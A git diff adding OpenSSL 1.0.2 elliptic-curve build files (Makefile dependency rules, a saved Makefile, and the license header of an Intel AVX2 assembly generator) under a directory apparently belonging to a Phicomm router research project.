+ec_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ec_asn1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ec_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_asn1.o: ../../include/openssl/ec.h ../../include/openssl/err.h
+ec_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ec_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ec_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_asn1.o: ../../include/openssl/symhacks.h ec_asn1.c ec_lcl.h
+ec_check.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_check.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_check.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_check.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_check.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_check.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_check.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_check.o: ../../include/openssl/symhacks.h ec_check.c ec_lcl.h
+ec_curve.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_curve.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_curve.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_curve.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_curve.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_curve.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_curve.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_curve.o: ../../include/openssl/symhacks.h ec_curve.c ec_lcl.h
+ec_cvt.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_cvt.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_cvt.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_cvt.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_cvt.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_cvt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_cvt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_cvt.o: ../../include/openssl/symhacks.h ec_cvt.c ec_lcl.h
+ec_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_err.o: ../../include/openssl/ec.h ../../include/openssl/err.h
+ec_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ec_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_err.o: ../../include/openssl/symhacks.h ec_err.c
+ec_key.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_key.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_key.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_key.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_key.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_key.o: ../../include/openssl/symhacks.h ec_key.c ec_lcl.h
+ec_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_lib.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_lib.o: ../../include/openssl/symhacks.h ec_lcl.h ec_lib.c
+ec_mult.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_mult.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_mult.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_mult.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_mult.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_mult.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_mult.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_mult.o: ../../include/openssl/symhacks.h ec_lcl.h ec_mult.c
+ec_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_oct.o: ../../include/openssl/symhacks.h ec_lcl.h ec_oct.c
+ec_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+ec_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ec_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ec_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_pmeth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ec_pmeth.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ec_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ec_pmeth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ec_pmeth.o: ../../include/openssl/opensslconf.h
+ec_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ec_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ec_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ec_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+ec_pmeth.o: ec_lcl.h ec_pmeth.c
+ec_print.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_print.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_print.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_print.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_print.o: ../../include/openssl/symhacks.h ec_lcl.h ec_print.c
+eck_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+eck_prn.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+eck_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eck_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eck_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eck_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eck_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eck_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eck_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+eck_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h eck_prn.c
+ecp_mont.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_mont.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_mont.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_mont.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_mont.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_mont.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_mont.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_mont.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_mont.c
+ecp_nist.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_nist.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_nist.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_nist.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_nist.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_nist.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_nist.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_nist.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_nist.c
+ecp_nistp224.o: ../../include/openssl/opensslconf.h ecp_nistp224.c
+ecp_nistp256.o: ../../include/openssl/opensslconf.h ecp_nistp256.c
+ecp_nistp521.o: ../../include/openssl/opensslconf.h ecp_nistp521.c
+ecp_nistputil.o: ../../include/openssl/opensslconf.h ecp_nistputil.c
+ecp_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_oct.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_oct.c
+ecp_smpl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_smpl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_smpl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_smpl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_smpl.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_smpl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_smpl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_smpl.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_smpl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile.save
new file mode 100644
index 0000000..ca44304
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile.save
@@ -0,0 +1,271 @@
+#
+# crypto/ec/Makefile
+#
+
+DIR=	ec
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=ectest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ec_lib.c ecp_smpl.c ecp_mont.c ecp_nist.c ec_cvt.c ec_mult.c\
+	ec_err.c ec_curve.c ec_check.c ec_print.c ec_asn1.c ec_key.c\
+	ec2_smpl.c ec2_mult.c ec_ameth.c ec_pmeth.c eck_prn.c \
+	ecp_nistp224.c ecp_nistp256.c ecp_nistp521.c ecp_nistputil.c \
+	ecp_oct.c ec2_oct.c ec_oct.c
+
+LIBOBJ=	ec_lib.o ecp_smpl.o ecp_mont.o ecp_nist.o ec_cvt.o ec_mult.o\
+	ec_err.o ec_curve.o ec_check.o ec_print.o ec_asn1.o ec_key.o\
+	ec2_smpl.o ec2_mult.o ec_ameth.o ec_pmeth.o eck_prn.o \
+	ecp_nistp224.o ecp_nistp256.o ecp_nistp521.o ecp_nistputil.o \
+	ecp_oct.o ec2_oct.o ec_oct.o $(EC_ASM)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ec.h
+HEADER=	ec_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+ecp_nistz256-x86_64.s: asm/ecp_nistz256-x86_64.pl
+	$(PERL) asm/ecp_nistz256-x86_64.pl $(PERLASM_SCHEME) > $@
+
+ecp_nistz256-avx2.s:   asm/ecp_nistz256-avx2.pl
+	$(PERL) asm/ecp_nistz256-avx2.pl $(PERLASM_SCHEME) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ec2_mult.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_mult.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_mult.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_mult.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_mult.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_mult.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_mult.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_mult.o: ../../include/openssl/symhacks.h ec2_mult.c ec_lcl.h
+ec2_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_oct.o: ../../include/openssl/symhacks.h ec2_oct.c ec_lcl.h
+ec2_smpl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_smpl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_smpl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_smpl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_smpl.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_smpl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_smpl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_smpl.o: ../../include/openssl/symhacks.h ec2_smpl.c ec_lcl.h
+ec_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+ec_ameth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ec_ameth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ec_ameth.o: ../../include/openssl/cms.h ../../include/openssl/crypto.h
+ec_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_ameth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+ec_ameth.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_ameth.o: ../../include/openssl/opensslconf.h
+ec_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ec_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ec_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ec_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+ec_ameth.o: ec_ameth.c
+ec_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ec_asn1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ec_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_asn1.o: ../../include/openssl/ec.h ../../include/openssl/err.h
+ec_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ec_asn1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ec_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_asn1.o: ../../include/openssl/symhacks.h ec_asn1.c ec_lcl.h
+ec_check.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_check.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_check.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_check.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_check.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_check.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_check.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_check.o: ../../include/openssl/symhacks.h ec_check.c ec_lcl.h
+ec_curve.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_curve.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_curve.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_curve.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_curve.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_curve.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_curve.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_curve.o: ../../include/openssl/symhacks.h ec_curve.c ec_lcl.h
+ec_cvt.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_cvt.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_cvt.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_cvt.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_cvt.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_cvt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_cvt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_cvt.o: ../../include/openssl/symhacks.h ec_cvt.c ec_lcl.h
+ec_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_err.o: ../../include/openssl/ec.h ../../include/openssl/err.h
+ec_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ec_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_err.o: ../../include/openssl/symhacks.h ec_err.c
+ec_key.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_key.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_key.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_key.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_key.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_key.o: ../../include/openssl/symhacks.h ec_key.c ec_lcl.h
+ec_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_lib.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_lib.o: ../../include/openssl/symhacks.h ec_lcl.h ec_lib.c
+ec_mult.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_mult.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_mult.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_mult.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_mult.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_mult.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_mult.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_mult.o: ../../include/openssl/symhacks.h ec_lcl.h ec_mult.c
+ec_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_oct.o: ../../include/openssl/symhacks.h ec_lcl.h ec_oct.c
+ec_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+ec_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ec_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ec_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ec_pmeth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ec_pmeth.o: ../../include/openssl/ecdsa.h ../../include/openssl/err.h
+ec_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ec_pmeth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ec_pmeth.o: ../../include/openssl/opensslconf.h
+ec_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ec_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ec_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ec_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+ec_pmeth.o: ec_lcl.h ec_pmeth.c
+ec_print.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec_print.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec_print.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_print.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec_print.o: ../../include/openssl/symhacks.h ec_lcl.h ec_print.c
+eck_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+eck_prn.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+eck_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eck_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eck_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eck_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eck_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eck_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eck_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+eck_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h eck_prn.c
+ecp_mont.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_mont.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_mont.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_mont.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_mont.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_mont.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_mont.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_mont.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_mont.c
+ecp_nist.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_nist.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_nist.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_nist.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_nist.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_nist.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_nist.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_nist.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_nist.c
+ecp_nistp224.o: ../../include/openssl/opensslconf.h ecp_nistp224.c
+ecp_nistp256.o: ../../include/openssl/opensslconf.h ecp_nistp256.c
+ecp_nistp521.o: ../../include/openssl/opensslconf.h ecp_nistp521.c
+ecp_nistputil.o: ../../include/openssl/opensslconf.h ecp_nistputil.c
+ecp_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_oct.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_oct.c
+ecp_smpl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ecp_smpl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ecp_smpl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ecp_smpl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ecp_smpl.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ecp_smpl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecp_smpl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecp_smpl.o: ../../include/openssl/symhacks.h ec_lcl.h ecp_smpl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-avx2.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-avx2.pl
new file mode 100755
index 0000000..4c220aa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-avx2.pl
@@ -0,0 +1,2093 @@
+#!/usr/bin/env perl
+
+##############################################################################
+#                                                                            #
+# Copyright 2014 Intel Corporation                                           #
+#                                                                            #
+# Licensed under the Apache License, Version 2.0 (the "License");            #
+# you may not use this file except in compliance with the License.           #
+# You may obtain a copy of the License at                                    #
+#                                                                            #
+#    http://www.apache.org/licenses/LICENSE-2.0                              #
+#                                                                            #
+# Unless required by applicable law or agreed to in writing, software        #
+# distributed under the License is distributed on an "AS IS" BASIS,          #
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
+# See the License for the specific language governing permissions and        #
+# limitations under the License.                                             #
+#                                                                            #
+##############################################################################
+#                                                                            #
+#  Developers and authors:                                                   #
+#  Shay Gueron (1, 2), and Vlad Krasnov (1)                                  #
+#  (1) Intel Corporation, Israel Development Center                          #
+#  (2) University of Haifa                                                   #
+#  Reference:                                                                #
